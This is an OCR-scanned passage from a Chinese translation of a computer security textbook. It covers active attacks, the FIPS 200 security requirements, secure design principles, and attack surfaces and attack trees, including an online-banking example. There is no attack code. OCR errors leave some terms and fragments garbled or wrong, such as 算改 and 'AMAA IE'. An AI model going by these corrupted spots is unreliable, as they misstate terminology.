© MAKE (modification of message) 简单 地 说 ， 是 指 合法 消息 的 某 些 部 分 被 算 改 ,或 者 
消息 被 延迟 或 被 重新 排序 ， 从 而 产生 非 授权 效果 。 例 如 ， 将 内 容 为 “允许 John Smith 
读 取 机 密 文件 accounts” 的 消息 算 改 为 “允许 Fred Brown 读 取 机 密 文件 accounts”。 
o 拒绝 服务 ( denial of service) 可 以 阻止 或 禁止 对 通信 设施 的 正常 使 用 或 管理 。 这 种 攻击 
可 能 有 具体 的 目标 。 比 如 ， 一 个 实体 可 能 禁止 所 有 发 向 某 个 目的 地 (如 安全 审计 服务 ) 
的 消息 。 另 一 种 形式 的 拒绝 服务 是 破坏 整个 网 络 ， 使 网 络 失效 或 过 载 从 而 降低 其 性 能 。 

主动 攻击 表现 出 与 被 动 攻击 相反 的 特征 。 被 动 攻 击 虽然 难以 检测 ， 但 却 有 办 法 防范 。 而 主 

动 攻击 却 很 难 绝对 地 进行 防范 ， 因 为 要 实现 这 个 目的 就 要 对 所 有 通信 设施 和 路 径 进 行 不 间断 的 
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物理 保护 。 所 以 重点 在 于 检测 主动 攻击 并 从 其 导致 的 破坏 或 延迟 中 恢复 过 来 。 由 于 检测 本 身 具 
有 威慑 作用 ， 所 以 它 也 可 以 对 防范 起 到 一 定 作用 。 
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有 很 多 种 方法 可 以 用 来 对 减少 脆弱 性 并 处 理 系统 资产 威胁 的 对 策 进行 分 类 和 描述 。 分 析 
其 中 的 几 种 方法 对 本 书 其 余 内 容 的 展开 是 很 有 价值 的 。 我 们 将 在 本 节 和 接 下 来 两 节 中 完成 这 项 
工作 。 本 节 我 们 分 析 从 功能 要 求 角度 来 讲 的 对 策 ， 遵 循 FIPS 200 (联邦 信息 和 信息 系统 最 低 安 
全 要 求 ) 定义 的 分 类 方法 。 该 标准 列举 了 17 个 安全 相关 的 领域 ， 涉 及 保护 信息 系统 及 其 处 理 、 
存储 和 传输 的 信息 的 机 密 性 、 完 整 性 和 可 用 性 。 这 些 领 域 定 义 在 表 1-4 中 。 


表 1-4 安全 要 求 (FIPS 200 ) 


访问 控制 (access control): 限制 信息 系统 只 能 由 授权 用 户 或 以 授权 用 户 名 义 执行 的 进程 或 设备 (包括 其 他 信息 系统 ) 
访问 ， 限 制 授权 用 户 被 允许 执行 的 事务 和 功能 的 类 型 。 


意识 和 培训 ( awareness and training): (i) 确保 信息 系统 的 管理 者 和 用 户 能 够 意识 到 与 他 们 的 活动 相关 的 安全 风 
险 ， 以 及 与 信息 系统 安全 相关 的 法 律 、 法 规 和 政策 ; (ii) 确保 个 人 通过 充分 的 培训 能 够 承担 与 信息 安全 相关 的 任 
务 和 职责 。 

审计 和 可 说 明 性 (audit and accountability): (i) 最 大 限度 地 创建 、 保 护 和 保留 信息 系统 审计 记录 ， 用 于 监视 、 分 析 、 
调查 和 报告 不 合法 的 、 非 授权 的 或 不 正当 的 信息 系统 活动 ; (ii) 确保 个 别 信息 系统 用 户 的 活动 能 被 唯一 追踪 ， 以 便 
他 们 对 自己 的 行为 负责 。 

认证 日 、 认 可 和 安全 评估 (certification accreditation and security assessment) : (i) 定期 评估 机 构 的 信息 系统 的 安全 
控制 措施 ， 确 定 该 控制 措施 在 其 应 用 中 是 否 有 效 ; (ii) 开发 并 实施 用 来 纠正 机 构 信息 系统 的 不 足 、 减 少 或 消除 其 脆 
BERTZ; Gii) 对 机 构 信息 系统 及 相关 的 信息 系统 连接 的 运行 授权 ; (iv) 实时 监视 信息 系统 的 安全 控制 措施 ， 
确保 控制 措施 的 持续 有 效 性 。 

配置 管理 (confguration management): (i) 建立 和 维护 贯穿 于 各 个 机 构 信 息 系统 开发 的 生命 周期 中 的 基线 配置 和 清 
单 (包括 硬件 、 软 件 、 固 件 和 文档 ); Gi) 建立 和 执行 在 机 构 信 息 系统 中 部 署 的 信息 技术 产品 的 安全 配置 。 

应 急 规 划 (contingency planning): 建立 、 维 护 和 实施 针对 机 构 信 息 系统 的 应 急 响 应 、 备 份 操作 和 灾后 恢复 的 计划 ， 
确保 在 紧急 情况 下 关键 信息 资源 的 可 用 性 和 操作 的 持续 性 。 

识别 与 认证 ( identification and authentication): 标识 信息 系统 用 户 、 以 用 户 名 义 进行 的 进程 或 设备 ， 认 证 (或 验证 ) 
这 些 用 户 、 进 程 或 设备 的 身份 ， 以 此 作为 允许 访问 机 构 信息 系统 的 先决 条 件 。 

事故 响应 (incident response): 建立 对 机 构 信 息 系 统 的 运行 事故 处 理 能 力 ， 包 括 充分 的 准备 、 检 测 、 分 析 、 遏 制 、 
恢复 和 用 户 响应 活动 ; Gi) 跟踪 、 记 载 并 将 事故 报告 给 适当 的 组 织 官员 及 管理 机 构 。 

维护 (maintenance) : (i) 对 机 构 信 息 系 统 进 行 定期 、 及 时 的 维护 ; G) 对 实施 信息 系统 维护 所 用 到 的 工具 、 技 术 、 
机 制 和 人 员 提 供 有 效 的 控制 。 

介质 保护 (media protection): (i) 保护 信息 系统 纸 制 和 数字 的 介质 ; (ii) 限制 授权 用 户 访问 信息 系统 介质 上 的 信息 ; 
(iii) 在 销毁 或 者 放弃 再 次 使 用 之 前 ， 消 除 或 破坏 信息 系统 介质 。 

物理 和 环境 保护 ( physical and environmental protection) : (i) 限制 授权 个 体 对 信息 系统 、 设 备 和 各 自 操 作 环境 的 物 
理 访问 ; (ii) 保护 信息 系统 的 物理 厂房 和 支持 基础 设施 ; (iii) 提供 对 信息 系统 的 支持 设施 ; ( iv) 保护 信息 系统 免 受 
环境 危害 ; (v) 对 包含 信息 系统 的 场所 提供 适当 的 环境 控制 措施 。 

规划 (planning): 开发 、 文 档 记 录 、 定 期 更 新 和 实施 机 构 信息 系统 的 安全 计划 ， 其 中 描述 了 信息 系统 中 适当 的 或 规 
划 中 的 安全 控制 措施 以 及 个 人 访问 信息 系统 的 行为 规则 。 

人 员 安 全 (personnel security): (i) 确保 机 构 (包括 第 三 方 服务 提供 者 ) 中 处 于 责任 岗位 的 个 人 是 可 信赖 的 并 
满足 已 建立 的 该 岗位 的 安全 准则 ; (ii) 保证 在 职工 离职 和 调动 等 人 事 活动 前 后 ， 机 构 信 息 和 信息 系统 是 受 保护 
的 ; (iii) 对 职工 不 能 遵守 机 构 的 安全 策略 和 程序 的 ， 制 定 正式 的 制裁 方法 。 


风险 评估 (risk assessment): 定期 评估 机 构 运行 (包括 任务 、 职 能 、 形 象 或 声誉 )、 机 构 资 产 和 个 体 的 风险 ， 这 根据 
机 构 信息 系统 的 运行 及 相关 的 机 构 信息 的 处 理 、 存 储 或 传输 得 出 。 


© 根据 习惯 ， 本 书 中 的 authentication 和 certification 均 译 为 “认证 ”。authentication 也 可 译 为 鉴别 ， 指 确保 实 
体 是 它 所 声称 的 实体 ， 如 身份 认证 ; certification 指 可 交付 件 是 否 符合 规定 需求 所 给 出 的 正式 保证 陈述 的 规 
程 ， 如 产品 认证 ,在 第 1 章 和 第 13 章 中 出 现 。 请 读者 根据 上 下 文 加 以 区 分 。 一 一 译 者 注 
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( 续 ) 


系统 和 服务 获取 (system and service acquisition): (i) 分 配 足够 的 资源 来 充分 保护 机 构 信 息 系统 ; (ii) 在 系统 开发 生 
命 周 期 中 考虑 信息 安全 问题 ; ( 证) 使 用 软件 用 法 和 安装 限制 ; (iv) 确保 第 三 方 提供 充分 的 安全 措施 来 保护 机 构 外 包 
的 信息 、 应 用 或 服务 。 i 


系统 和 通信 保护 ( system and communication protection): (i) 在 信息 系统 的 外 边界 和 关键 内 边界 上 监视 、 控 制 和 保 
护 机 构 通信 ( 即 机 构 信息 系统 的 信息 传输 或 接收 ); (ii) 利用 架构 设计 、 软 件 开发 技术 和 系统 工程 原理 来 提高 机 构 信 
息 系统 的 信息 安全 的 有 效 性 。 


系统 和 信息 完整 性 (system and information integrity): (i) 及 时 地 识别 、 报 告 和 纠正 信息 和 信息 系统 的 缺陷 ; (ii) 在 
机 构 信息 系统 的 适当 位 置 提供 恶意 代码 防护 ;( 道 ) 监视 信息 系统 安全 报警 和 警告 ， 并 采取 适当 的 行动 作为 响应 。 


列举 在 FIPS 200 中 的 要 求 ， 包 含 了 针对 安全 脆弱 性 和 威胁 的 多 种 对 策 。 我 们 可 以 粗略 地 
将 这 些 对 策 分 成 两 类 : 一 类 要 求 计 算 机 安全 技术 措施 〈 本 书 的 第 一 部 分 和 第 二 部 分 会 涉及 )， 要 
么 仅 包 含 硬件 或 软件 ， 要 人 么 二 者 都 包含 ; 另 一 类 基本 上 是 管理 问题 (本 书 的 第 三 部 分 会 涉及 )。 

每 一 个 功能 领域 可 能 都 会 涉及 计算 机 安全 技术 措施 和 管理 措施 。 主 要 要 求 计算 机 安全 技术 
措施 的 功能 领域 ,， 包括 访问 控制 、 识 别 与 认证 、 系 统 与 通信 保护 、 系 统 与 信息 完整 性 。 主 要 涉 
及 管理 控制 措施 和 程序 的 功能 领域 ， 包 括 意 识 与 培训 ， 审 计 与 可 说 明 性 ， 认 证、 资格 认可 和 安 
全 评估 ， 应 急 计 划 ， 维 护 ， 物 理 和 环境 保护 ， 规 划 ， 人 员 安 全 ， 风 险 评 估 ， 系 统 和 服务 获取 。 
同时 包含 在 计算 机 安全 技术 措施 和 管理 控制 措施 中 的 功能 领域 ,包括 配置 管理 、 事 故 响应 和 介 
质保 护 。 

值得 注意 的 是 ，FIPS 200 中 的 大 多 数 功能 要 求 领域 主要 是 管理 问题 或 者 至 少 有 重要 的 管理 
组 件 ， 这 与 纯 软 件 或 硬件 解决 方案 是 相对 的 。 一 些 读者 可 能 会 对 此 觉得 很 新 鲜 ， 但 其 却 没有 在 
许多 计算 机 和 信息 安全 的 书籍 中 体现 出 来 。 正 如 一 个 计算 机 安全 专家 所 言 ,“ 如 果 你 认为 技术 
可 以 解决 安全 问题 ， 那 么 你 并 不 理解 安全 问题 ， 也 并 不 理解 技术 ”[SCHN00]。 本 书 指出 有 必 
要 将 技术 和 管理 方法 结合 起 来 以 取得 有 效 的 计算 机 安全 。 

FIPS 200 提供 了 技术 和 管理 方面 的 主要 相关 领域 的 非常 有 用 的 概述 ， 这 些 都 与 计算 机 安全 
相关 。 本 书 努力 涵盖 所 有 这 些 领 域 。 


14 基本 安全 设计 原则 


尽管 经 历 了 多 年 的 研究 和 发 展 ， 系 统 地 排除 安全 漏洞 、 防 止 未 经 授权 的 所 有 操作 的 安全 设 
计 和 实现 技术 还 没有 开发 出 来 。 由 于 缺少 完备 的 技术 ， 因 此 制定 一 系列 被 广泛 认可 的 设计 原则 
以 指导 保护 机 制 的 开发 是 非常 必要 的 。 美 国 国家 安全 局 (NSA) 和 美国 国土 安全 部 (DHS) 联 
合 创建 的 信息 保障 /网络 防御 国家 卓越 学 术 中心 (The National Centers of Academic Excellence 
in Information Assurance/Cyber Defense) 列 出 了 以 下 基本 安全 设计 原则 : 

e 经 济 机 制 (economy of mechanism) 原则 

e 安全 缺 省 设置 (fail-safe default) 原则 

e 绝对 中 介 (complete mediation) 原则 

© 开放 式 设计 (open design) 原则 

e 特权 分 离 (separation of privilege) 原则 

e 最 小 特权 (least privilege) 原则 

o 最 小 共用 机 制 (least common mechanism) 原则 

e 心理 可 接受 性 (psychological acceptability) 原则 

o 隔离 (isolation) 原则 

o 封装 (encapsulation) 原则 
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e 模块 化 (modularity) 原则 

e 分 层 (layering) 原则 

o 最 小 惊动 (least astonishment) 原则 

前 八 项 原则 最 早 被 列 人 文献 [SALT75]， 并 经 历 了 时 间 的 考验 。 本 节 中 ， 我 们 将 简要 地 讨 
论 上 述 每 一 个 原则 。 

经 济 机 制 原则 ， 指 岁入 在 硬件 和 软件 中 的 安全 机 制 的 设计 要 尽 可 能 简单 、 短 小 。 这 是 因 
为 ， 简单、 短小 的 设计 更 易于 进行 彻底 的 测试 和 验证 。 复 杂 的 设计 则 为 敌手 发 现 和 利用 微小 的 
缺陷 提供 了 更 多 的 机 会 ， 并 且 很 难 被 事先 发 现 。 设 计 机 制 越 复 杂 ， 包 含 可 利用 缺陷 的 可 能 性 越 
大 。 而 在 简单 的 机 制 中 则 很 难 发 现 可 利用 的 缺陷 ， 并 且 需 要 更 少 的 维护 。 此 外 ， 由 于 配置 管理 
问题 的 简化 ， 因 此 更 新 或 替代 一 个 简单 机 制 也 不 会 太 烦 琐 。 在 实践 中 ， 这 可 能 是 最 难 遵守 的 原 
则 。 在 复杂 的 安全 设计 任务 中 ， 对 硬件 和 软件 新 特性 都 会 有 持续 的 要 求 。 所 以 在 进行 系统 设计 
的 时 候 应 当 考 虑 此 原则 ， 尽 量 降 低 不 必要 的 复杂 性 。 

安全 缺 省 设置 原则 ， 指 访问 控制 应 当 基 于 许可 而 不 是 排除 。 也 就 是 说 ， 缺 省 的 情形 是 不 能 
进行 访问 的 ， 而 保护 方案 可 以 识别 在 什么 情况 下 访问 是 被 允许 的 。 当 缺 省 的 选择 基于 许可 时 ， 
这 种 方式 比 另 一 种 方式 能 更 好 地 识别 故障 。 如 果 一 个 机 制 中 的 设计 或 实现 出 现 了 故障 ， 则 在 安 
全 环境 下 (基于 许可 )， 很 快 就 能 发 现 这 一 问题 ， 因 为 在 该 模式 下 会 被 拒绝 访问 。 相 反 地 ， 如 
果 故 障 出 现在 以 排除 作为 访问 控制 的 环境 下 ， 这 个 故障 可 能 会 持续 很 久 都 不 会 被 发 现 ， 因 为 默 
认 是 允许 访问 的 。 举 例 来 说 ， 大 多 数 文件 存 取 系统 都 基于 这 一 原则 ， 实 际 上 在 客户 端 /服务 器 
系统 中 ， 所 有 被 保护 的 服务 也 都 是 基于 这 一 原则 。 

绝对 中 介 原 则 ， 指 每 一 次 访问 都 应 当 依 据 访问 控制 机 制 进行 检查 。 系 统 不 应 该 依赖 于 从 
缓存 中 检索 到 的 访问 命令 。 在 设计 持续 运行 的 系统 时 ， 这 一 原则 要 求 ， 如果 访问 命令 被 提示 
是 将 来 使 用 它 ， 那 么 如 何 改变 优先 级 顺序 的 详细 说 明 被 传递 给 本 地 存储 器 。 文 件 访问 系统 则 
是 遵守 这 一 原则 的 例子 。 然 而 ， 通 常情 况 下 ， 一旦 用 户 打 开 了 一 个 文件 ， 对 是 否 有 权限 的 改 
变 则 不 会 进行 检查 。 为 彻底 实现 绝对 中 介 ， 用 户 每 次 读 取 文 件 的 一 个 域 或 记录 时 ， 或 者 数据 
库 中 的 一 个 数据 项 时 ， 系 统 都 必须 进行 访问 控制 。 这 一 资源 密集 ( 即 占用 大 量 资源 ) 的 方法 
很 少 被 使 用 。 

开放 式 设计 原则 ， 指 安全 机 制 的 设计 应 当 开 放 而 非 保密 。 例 如 ， 虽 然 加 密 密 钥 是 保密 的 ， 
但 加 密 算 法 则 应 彻底 地 对 外 公开 。 这 样 算法 就 能 被 许多 专家 审查 ， 因 此 用 户 就 能 对 其 更 加 信 
任 。 这 是 NIST (National Institute of Standards and Technology: 国家 标准 技术 局 ) 所 遵从 的 ， 标 
准 化 的 加 密 和 散 列 算法 程序 已 使 NIST 认证 算法 被 广泛 认可 。 

特权 分 离 原则 ， 在 文献 [SALT75] 中 ， 特 权 分 离 原则 是 为 对 于 限定 资源 的 访问 需要 多 特权 
属性 的 情况 定义 的 。 多 因素 用 户 认 证 就 是 一 个 很 好 的 例子 ， 它 需要 用 多 种 技术 ， 比 如 同时 拥有 
密码 和 智能 卡 ， 才 能 对 用 户 授权 。 这 一 原则 也 应 用 于 任何 一 项 技术 ， 只 要 程序 能 被 分 成 多 个 部 
分 ， 而 每 个 部 分 受 限 于 各 个 部 分 的 特定 权限 而 执行 一 个 特定 的 任务 。 特 权 分 离 可 以 减轻 计算 机 
安全 攻击 可 能 造成 的 破坏 。 这 可 以 通过 下 面 的 例子 说 明 : 将 一 个 进程 的 高 特权 操作 转移 给 另 一 
个 进程 并 运行 这 个 进程 去 完成 具有 更 高 特权 要 求 的 任务 。 日 常 我 们 所 见 到 的 各 种 界面 都 通过 更 
低 权限 的 进程 执行 。 

最 小 特权 原则 ， 是 指 每 个 进程 和 系统 用 户 都 应 当 使 用 完成 某 项 任务 必需 的 最 少 特权 集 进行 
操作 。 很 好 地 利用 这 一 原则 的 例子 就 是 基于 角色 的 访问 控制 ， 第 4 章 将 对 此 详细 阐述 。 系 统 安 
全 策略 可 以 识别 或 定义 出 不 同 的 进程 或 用 户 角 色 。 每 一 个 角色 被 分 配 仅 完成 其 功能 所 必需 的 许 
可 权 。 每 个 许可 都 指定 了 一 个 对 特定 资源 的 访问 权 (例如 ， 读 写 访问 一 个 特定 的 文件 或 目录 ， 
又 如 连接 访问 给 定 的 主机 或 端口 等 )。 除 非 明确 地 授予 了 权限 ， 否 则 用 户 或 进程 都 不 能 访问 受 
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保护 的 资源 。 更 一 般 的 情况 ， 任 何 一 个 访问 控制 系统 都 应 该 允许 每 一 个 用 户 仅 具 有 其 被 授予 的 
特权 。 最 小 权限 原则 具有 暂时 性 。 例 如 ， 具 有 特殊 权限 的 系统 程序 或 管理 员 应 当 仅 在 必要 时 使 
用 这 些 特权 ; 当 进 行 常规 的 活动 时 ， 这 些 特权 应 当 被 收回 。 如 果 没 有 妥善 地 处 理 这 个 问题 就 容 
易 引 发 意外 事件 的 发 生 。 

最 小 共用 机 制 原则 ， 指 在 设计 时 应 当 最 小 化 不 同 用 户 共享 的 功能 ， 以 提高 彼此 的 安全 性 。 
这 一 原则 有 助 于 减少 非 预期 的 通信 路 径 的 数量 ， 减 少 所 有 用 户 共同 依赖 的 硬件 和 软件 数量 ， 因 
此 更 易 发 现 是 否 存在 安全 隐患 。 

心理 可 接受 性 原则 ， 指 安全 机 制 不 应 该 过 度 干涉 用 户 的 工作 ， 同 时 也 要 满足 用 户 授权 访问 
的 要 求 。 如 果 安 全 机 制 阻碍 了 资源 的 可 用 性 或 可 访问 性 ， 用 户 就 可 能 选择 关闭 这 些 机 制 。 安 全 
机 制 应 当 尽 可 能 地 对 系统 的 用 户 透 明 ， 或 者 最 小 化 给 用 户 带 来 的 不 便 。 除 了 不 妨碍 用 户 或 者 引 
起 过 多 的 负担 ， 安 全 实施 过 程 还 必须 反映 用 户 理想 的 保护 模式 。 如 果 保 护 实施 过 程 对 用 户 来 说 
无 意义 ,或 者 用 户 必须 将 其 保护 的 愿望 强行 转变 为 许多 各 种 不 同 的 协议 ， 那么 用 户 则 很 可 能 会 
犯错 误 。 

隔离 原则 ， 这 一 原则 应 用 于 三 种 环境 。 第 一 ， 公 共 访 问 系统 应 当 与 重要 的 资源 (数据 、 进 
程 等 ) 分 离 ， 以 免 其 被 暴露 或 算 改 。 在 信息 的 敏感 性 或 重要 性 很 高 时 ， 组 织 就 要 限制 系统 存储 
的 相关 数据 的 数量 ， 并 在 物理 上 或 逻辑 上 对 其 进行 隔离 。 物 理 隔离 应 当 确 保 一 个 组 织 中 的 公共 
访问 信息 资源 与 重要 信息 之 间 没 有 物理 上 的 连接 。 逻 辑 隔 离 的 要 求 是 ， 在 公共 系统 和 负责 保障 
重要 信息 安全 性 的 安全 系统 之 间 应 当 建 立 层 次 化 的 安全 服务 与 安全 机 制 。 第 二 ， 个 人 用 户 的 进 
程 和 文件 应 当 与 他 人 的 相隔 离 ， 除 非 明确 要 求 不 进行 隔 。 所 有 的 现代 操作 系统 都 提供 了 这 种 隔 
离 的 设备 ， 以 保证 个 人 用 户 有 分 离 的 、 隔 离 的 进程 空间 、 存 储 空间 和 文件 空间 ， 通 过 阻止 非 授 
权 的 访问 来 实现 对 系统 的 安全 保护 。 最 后 ， 从 阻止 对 安全 机 制 访问 的 意义 上 说 ， 安 全 机 制 也 应 
当 被 隔离 。 例 如 ， 逻 辑 访 问 控制 可 能 提供 了 一 个 与 主机 系统 其 他 部 分 相隔 离 的 加 密 软件 ， 用 以 
保护 加 密 软件 不 被 自 改 ， 密 钥 不 被 替代 或 泄露 。 

封装 原则 ， 可 以 将 其 视 为 基于 面向 对 象 功 能 的 一 种 特殊 形式 的 隔离 。 封 装 提供 安全 是 通过 
如 下 方式 实现 的 : 封装 一 系列 过 程 及 其 域 中 的 数据 对 象 ， 以 使 数据 对 象 的 内 部 结构 仅 能 被 受 保 
护 的 子 系统 中 的 过 程 访 问 ， 并 且 这 些 过 程 也 只 能 通过 特定 的 域 的 人口 点 被 调用 。 

模块 化 原则 ， 在 安全 的 背景 下 是 指 将 各 个 安全 功能 开发 成 分 离 的 、 受 保护 的 模块 ， 也 指使 
用 模块 化 架构 进行 安全 机 制 的 设计 和 实现 。 关 于 使 用 分 离 的 安全 模块 ， 设 计 目 标 就 是 提供 公共 
的 安全 功能 和 服务 ， 比 如 加 密 功 能 ， 作 为 公共 模块 。 例 如 ， 大 量 的 协议 和 应 用 程序 都 使 用 加 密 
功能 。 但 并 不 是 在 每 个 协议 或 应 用 程序 中 都 需要 实现 这 一 功能 ， 而 一 个 更 加 安全 的 设计 是 通过 
开发 一 个 能 够 被 大 量 协 议和 应 用 程序 调用 的 公共 的 加 密 模块 来 实现 。 这 样 ， 设 计 和 实现 工作 就 
集中 到 安全 的 这 一 公共 加 密 模块 的 设计 与 实现 上 了 ， 包 括 模块 免 遭 自 改 的 保护 机 制 。 关 于 模块 
化 架构 的 使 用 ， 每 个 安全 机 制 都 应 支持 向 新 技术 的 移植 或 者 无 须 重新 设计 整个 系统 升级 新 的 特 
征 。 安 全 设计 应 当 模 块 化 ， 以 使 安全 设计 的 某 些 单个 部 分 可 以 进行 升级 ， 而 无 需 对 整个 系统 进 
行 修改 。 

分 层 原 则 ， 指 的 是 使 用 多 重 的 、 重 到 的 保护 办 法 ， 它 强调 的 是 信息 系统 的 人 员 、 技 
术 和 操作 方面 。 通 过 使 用 多 重 的 、 重 到 的 保护 方法 ， 任 何 单一 的 保护 方法 失效 或 被 规避 
都 不 会 将 系统 置 于 不 受 保护 的 状况 。 在 阅读 全 书 时 我 们 会 发 现 ， 分 层 方 法 通常 是 被 用 
来 在 敌手 与 受 保护 的 信息 与 服务 之 间 提 供 多 重 障碍 的 。 这 一 技术 通常 也 被 称 为 深度 防 衔 
(defense in depth), 

最 小 惊动 原则 ， 指 程序 或 用 户 界面 的 响应 方式 应 当 尽量 不 出 乎 用 户 的 意料 ， 不 至 于 惊吓 到 
用 户 。 例 如 ， 认 证 机 制 对 用 户 来 讲 应 当 足 够 透明 ， 用 户 能 够 直接 明白 安全 目标 与 所 提供 的 安全 
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机 制 之 间 是 如 何 对 应 的 。 


15 攻击 面 和 攻击 树 


在 1.2 节 中 ,给 出 了 关于 计算 机 和 网 络 系统 的 安全 威胁 和 攻击 的 概述 。 本 书 8.1 节 将 更 加 
详细 地 介绍 攻击 的 本 质 和 带 来 安全 威胁 的 敌手 的 类 型 。 本 节 中 ， 我 们 将 详细 介绍 对 评估 和 分 类 
威胁 非常 有 用 的 两 个 概念 : 攻击 面 和 攻击 树 。 


1.5.1 攻击 面 


攻击 面 是 由 系统 中 可 到 达 的 和 可 被 利用 的 脆弱 点 构成 的 [MANA11, HOWA03]。 以 下 是 攻 
击 面 的 例子 : 
© 对 外 开放 的 Web 和 其 他 服务 器 的 端口 ， 监 听 这 些 端 口 的 代码 ; 
© 在 防火 墙 内 可 用 的 服务 ; 
o 处 理 进入 内 部 的 数据 、 电 子 邮 件 、XML、 办 公文 档 和 工业 级 定制 数据 交换 格式 的 代码 ; 
e 界面 、SQL 和 Web 表单; 
。 对 人 敏感 信息 有 访问 权限 的 员工 ， 这 些 敏 感 数据 可 能 会 受到 社会 工程 学 的 攻击 。 
攻击 面 可 以 按 如 下 方式 分 类 : 
e 网 络 攻击 面 : 网 络 攻击 面 是 指 企业 网 、 广 域 网 或 者 局 域 网 中 的 脆弱 点 或 漏洞 ， 包 括 网 
络 协议 中 的 脆弱 点 ， 例 如 利用 这 些 弱 点 进行 拒绝 服务 攻击 、 通 信 线 路 破坏 和 各 种 不 同 
形式 的 入侵 攻击 。 
RAGA: 软件 攻击 面 是 指 应 用 程序 、 实 用 程序 或 操作 系统 代码 中 的 漏洞 ， 尤 其 是 
E Web 服务 器 软件 中 的 漏洞 。 
e 人 为 攻击 面 : 人 为 攻击 面 是 指 员工 或 者 外 部 人 员 ， 诸 如 社会 工程 学 、 人 为 错误 和 受信 
任 的 内 部 人 员 引 起 的 脆弱 点 。 
攻击 面 分 析 是 评估 系统 威胁 的 规模 和 严重 性 有 
用 的 技术 。 对 这 些 脆弱 点 进行 系统 的 分 析 可 使 开发 
者 和 安全 分 析 师 能 够 知道 哪些 安全 机 制 是 必需 的 。 
一 旦 攻击 面 被 定义 出 来 ,设计 人 员 就 可 能 会 找到 减 
小 攻击 面 的 方法 ， 从 而 能 使 敌手 的 人 侵 更 加 困难 。 
攻击 面 也 可 以 为 测试 、 增 加 安全 性 方法 、 修 改 服务 
和 应 用 程序 等 分 配 优先 级 提供 指导 。 
图 1-3 显示 了 分 别 使 用 分 层 技术 、 深 度 防御 和 
减少 攻击 面 在 降低 风险 中 的 互补 关系 。 


1.5.2 ”攻击 树 


攻击 树 是 一 个 分 支 型 的 、 层 次 化 的 数据 结构 ， 攻击 面 

表示 了 一 系列 潜在 技术 ， 这 些 技术 可 利用 安全 漏洞 图 1-3 ”深度 防御 和 攻击 面 
[MAUW05, MOOR01, SCHN99] 进行 攻击 。 作 为 攻 

击 目 标的 安全 事件 是 这 个 树 的 根 节点 ， 攻 击 者 可 以 迭 代 地 、 递 增 地 达到 这 个 目标 的 途径 就 是 这 
棵 树 的 分 支 和 子 节点 。 每 一 个 子 节点 都 定义 了 一 个 子 目标 ， 每 一 个 子 目标 都 可 能 有 一 系列 的 进 
一 步 的 子 目标 ， 等 等 。 从 根 节点 沿 着 路 径 向 外 延伸 的 最 终 的 节点 ， 也 就 是 叶子 节点 ， 代 表 了 发 
起 一 个 攻击 的 不 同方 式 。 除 了 叶子 节点 外 的 每 一 个 节点 ， 或 者 是 与 节点 (AND-node) 或 者 是 或 
节点 (OR-node)。 若 想 达 成 与 节点 表示 的 目标 ， 则 该 节点 的 所 有 子 节点 所 代表 的 子 目 标 都 要 求 
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被 实现 ; 若 想 达成 或 节点 表示 的 目标 ， 则 只 需 完 成 其 中 至 少 一 个 子 目 标 即 可 。 分 支 可 以 用 代表 
难度 、 代 价 或 其 他 攻击 属性 的 值 标注 ， 以 便 与 可 选择 的 攻击 进行 比较 。 

使 用 攻击 树 的 动机 是 有 效 地 利用 存在 于 攻击 模式 中 的 有 效 信息 。 例 如 CERT (计算 机 应 急 
响应 小 组 ) 这 样 的 组 织 机 构 公 布 了 攻击 对 手 ， 这 些 对 手 开发 了 通用 安全 攻击 策略 和 特定 攻击 
模式 相关 的 知识 体系 。 安 全 分 析 师 利用 攻击 树 可 以 形成 结构 化 形式 的 安全 攻击 文档 ， 用 以 揭 
示 主 要 的 安全 漏洞 。 攻 击 树 对 系统 和 应 用 程序 的 设计 ， 以 及 对 对 策 的 选取 和 强化 都 具有 指导 
作用 。 

1-4 (WÄ [DIMI07]) 是 一 个 网 银 认 证 应 用 的 攻击 树 分 析 例 子 。 根 节点 是 攻击 者 的 目标 ， 
即 获取 用 户 账户 。 树 中 具有 阴影 的 方 框 部 分 为 叶子 节点 ， 由 构成 攻击 的 事件 组 成 。 树 中 的 白 框 
部 分 通常 是 由 一 个 或 多 个 特定 的 攻击 事件 (叶子 节点 ) 组 成 的 。 注 意 在 这 棵 树 中 ， 除 了 叶子 节 
点 的 所 有 节点 都 是 或 节点 (OR-node)。 生 成 这 棵 树 进 行 分 析 时 ， 要 考虑 与 认证 相关 的 如 下 三 
部 分 : 

e 用 户 终端 和 用 户 (User Terminal and User, UT/U): 这 种 攻击 把 用 户 设备 作为 攻击 目标 ， 

包括 可 能 涉及 的 令 牌 ,例如 智能 卡 或 其 他 口令 生成 器 ， 也 可 能 是 用 户 的 各 种 操作 。 

o 通信 信道 (Communication Channel, CC): 此 类 攻击 主要 集中 在 通信 线路 。 

© 网 银 服务 器 (Internet Banking Server, IBS): 此 类 攻击 主要 针对 网 银 应 用 所 在 的 服务 器 

进行 离线 攻击 。 

共有 五 类 攻击 可 以 被 识别 ， 每 种 攻击 都 利用 了 以 上 三 个 部 分 中 的 一 个 或 多 个 。 以 下 是 这 
五 类 . 

o AMAA IE (user credential compromise): 这 种 策略 通常 是 针对 攻击 面 中 的 许多 元 

素 的 。 有 实施 程序 上 的 攻击 ， 例 如 监视 用 户 的 行为 以 获取 个 人 标识 码 (PIN) 或 其 
他 凭证 ， 或 者 盗 取 用 户 的 令 牌 或 手写 记录 。 敌 手 可 能 会 通过 使 用 多 种 令 牌 窃取 工 
具 来 获取 令 牌 信息 ， 例 如 破解 智能 卡 (hack smartcard) 或 蛮 力 破解 PIN。 另 一 种 
可 能 的 策略 是 能 入 恶意 软件 以 获取 用 户 的 登录 名 及 密码 。 敌 手 可 能 会 通过 通信 信 
道 ( 嗅 探 ) 来 获取 凭证 信息 。 最 后 ， 敌 手 还 可 能 通过 多 种 手段 与 目标 用 户 进行 通 
信 ， 如 图 1-4 所 示 。 

e 命令 注入 (injection of command): 在 此 类 攻击 中 ， 人 侵 者 能 够 截取 UT 与 IBS 之 间 的 
通信 信息 。 许 多 方法 都 能 用 来 冒充 真正 的 用 户 ， 从 而 获取 银行 系统 的 访问 权限 。 
猜测 用 户 赁 证 (user credential guessing): [HILT06] 中 记载 ， 通 过 发 送 随机 用 户 名 和 密 
码 的 方法 蛮 力 攻击 银行 认证 方案 是 可 行 的 。 这 种 攻击 机 制 是 基于 分 布 式 的 僵尸 网 络 ， 
迫使 主机 忙于 自动 运行 基于 用 户 名 或 基于 密码 的 运算 。 
安全 策略 违反 (security policy violation): 例如 ， 在 一 个 弱 访 问 控制 和 登录 机 制 下 违反 
银行 的 安全 策略 ， 员 工 可 能 会 导致 内 部 事故 发 生 ， 暴 露 客户 的 账户 信息 。 
